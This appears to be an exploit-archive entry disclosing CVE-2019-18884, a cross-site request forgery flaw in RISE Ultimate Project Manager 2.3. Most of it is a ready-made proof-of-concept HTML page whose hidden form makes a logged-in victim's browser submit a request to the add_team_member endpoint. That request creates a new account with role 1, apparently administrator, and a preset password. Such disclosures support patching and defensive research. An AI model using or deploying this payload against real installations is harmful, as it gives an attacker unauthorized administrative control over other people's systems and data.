RISE Ultimate Project Manager version 2.3 suffers from a cross site request forgery vulnerability.
41fa5b9666e2e4e28c294e54488d568d# Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)
# Date: 11-11-2019
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://fairsketch.com/
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641
# Software : RISE - Ultimate Project Manager
# Product Version: Version 2.3
# Vulernability Type : Cross-Site Request Forgery
# Vulenrability : Cross-Site Request Forgery (Add Admin)
# CVE : CVE-2019-18884
# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 has CSRF for adding authorized users.
# CSRF PoC :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">
<input type="hidden" name="first_name" value="Ismail" />
<input type="hidden" name="last_name" value="Tasdelen" />
<input type="hidden" name="address" value="[email protected]" />
<input type="hidden" name="phone" value="+12345678975" />
<input type="hidden" name="gender" value="male" />
<input type="hidden" name="job_title" value="Security Researcher" />
<input type="hidden" name="salary" value="100000" />
<input type="hidden" name="salary_term" value="12" />
<input type="hidden" name="date_of_hire" value="2019-11-11" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="iQ.grF10" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="email_login_details" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>